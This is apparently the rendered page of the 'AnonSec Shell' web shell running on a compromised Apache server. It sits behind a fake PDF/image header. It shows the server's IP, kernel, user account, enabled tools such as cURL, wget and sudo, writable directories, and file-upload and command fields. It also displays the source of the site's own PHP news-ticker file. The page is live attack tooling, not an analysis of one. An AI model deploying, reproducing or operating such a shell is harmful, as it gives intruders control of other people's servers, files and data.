%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/inc/scroll_f.php
<?php require_once('../Connections/french.php'); ?>
<?php
if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

mysql_select_db($database_main, $main);
$query_Recordset1 = "SELECT id, header_f, `date`, show_f, picture, pic_caption_f FROM news WHERE show_f = 1  ORDER BY `date` DESC";
$Recordset1 = mysql_query($query_Recordset1, $main) or die(mysql_error());
$row_Recordset1 = mysql_fetch_assoc($Recordset1);
$totalRows_Recordset1 = mysql_num_rows($Recordset1);

$maxRows_Recordset2 = 10;
$pageNum_Recordset2 = 0;
if (isset($_GET['pageNum_Recordset2'])) {
  $pageNum_Recordset2 = $_GET['pageNum_Recordset2'];
}
$startRow_Recordset2 = $pageNum_Recordset2 * $maxRows_Recordset2;

mysql_select_db($database_main, $main);
$query_Recordset2 = "SELECT id, header_f, `date`, show_f FROM news WHERE show_f = 1  ORDER BY `date` DESC";
$query_limit_Recordset2 = sprintf("%s LIMIT %d, %d", $query_Recordset2, $startRow_Recordset2, $maxRows_Recordset2);
$Recordset2 = mysql_query($query_limit_Recordset2, $main) or die(mysql_error());
$row_Recordset2 = mysql_fetch_assoc($Recordset2);

if (isset($_GET['totalRows_Recordset2'])) {
  $totalRows_Recordset2 = $_GET['totalRows_Recordset2'];
} else {
  $all_Recordset2 = mysql_query($query_Recordset2);
  $totalRows_Recordset2 = mysql_num_rows($all_Recordset2);
}
$totalPages_Recordset2 = ceil($totalRows_Recordset2/$maxRows_Recordset2)-1;
 ?>
<html dir="rtl">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"><meta http-equiv="expires" content="Tue, Nov 21 2000 05:00:00 GMT">
<meta http-equiv=cache-control content=no-cache>
<style type="text/css">
<!--
.frame {  background-image: url(image/sviva_add.jpg); background-repeat: no-repeat}
.c {  font-family: Arial, Helvetica, sans-serif; font-size: 12pt; color: #CC6633; font-weight: bold; vertical-align: text-bottom }
.text {  font-family: Arial, Helvetica, sans-serif; font-size: 9pt; color: #000033; text-decoration: none}
.date { font-family: Arial, Helvetica, sans-serif; font-size: 9pt; color: #990000}
.textbold { font-family: Arial, Helvetica, sans-serif; font-size: 10pt; color: #000033; text-decoration: none ; font-weight: bold}
a:hover {  font-family: Arial, Helvetica, sans-serif; font-size: 9pt; text-decoration: underline}
a:active {  text-decoration: none}
a:visited {  text-decoration: none}
-->
</style>

<body class="Gradient" LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<TABLE WIDTH="698" ALIGN="CENTER" HEIGHT="35" BACKGROUND="http://www.meirpanim.fr/images/news_frame.gif" style="margin-right:2px;"> 
<TR> <TD WIDTH="10"></TD><TD><MARQUEE DIRECTION="left" BEHAVIOR="scroll" SCROLLAMOUNT="2"  ONMOUSEOUT=this.scrollAmount=2; ONMOUSEOVER=this.scrollAmount=0;  SCROLLDELAY="2" HSPACE="10" DIR="ltr">
<?php do { ?>
  <SPAN CLASS="date" DIR="ltr"><?php
$timestamp = strtotime($row_Recordset2['date']); //1072915200
echo date('M d', $timestamp);
?>
    </SPAN> 
  <A HREF="http://www.meirpanim.fr/news_f.php?id=<?php echo $row_Recordset2['id']; ?>" TARGET="_top" CLASS="text"> 
    <?php echo $row_Recordset2['header_f']; ?></A>&nbsp; <span class="c">&#149;</span>
  <?php } while ($row_Recordset2 = mysql_fetch_assoc($Recordset2)); ?>
</MARQUEE></TD></TR> </TABLE><span class="c"></span> 
</body>
</html>
<?php
mysql_free_result($Recordset1);

mysql_free_result($Recordset2);
?>


Anon7 - 2022
AnonSec Team